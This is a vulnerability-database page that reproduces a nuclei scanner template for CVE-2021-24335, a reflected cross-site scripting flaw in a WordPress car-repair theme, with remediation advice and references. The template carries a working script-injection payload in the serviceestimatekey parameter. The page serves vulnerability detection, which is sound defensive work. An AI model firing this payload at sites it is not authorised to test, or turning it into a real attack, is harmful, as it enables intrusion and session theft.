Lucene search
K

WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Reflected Cross-Site Scripting in WordPress Car Repair Services & Auto Mechanic Theme <4.0

Related
Refs
Code
id: CVE-2021-24335

info:
  name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability.
  reference:
    - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
    - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
    - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
    - https://m0ze.ru/vulnerability/%5B2021-02-12%5D-%5BWordPress%5D-%5BCWE-79%5D-Car-Repair-Services-WordPress-Theme-v3.9.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24335
    cwe-id: CWE-79
    epss-score: 0.03884
    epss-percentile: 0.88968
    cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: smartdatasoft
    product: "car_repair_services_\\&_auto_mechanic"
    framework: wordpress
  tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/car-repair-services/css'
          - '/wp-content/themes/car-repair-services/js'
          - 'id="car-repair-services-'
        condition: or

  - method: GET
    path:
      - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100805189b9176bdfc93323772980f8eab0b4f76741e8e6f8400995831ca9b77e650220799c490ba693ec1b9f96760fbc3bc4df5491805b66e6ff7c45181c3bb122dd9d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.03884
19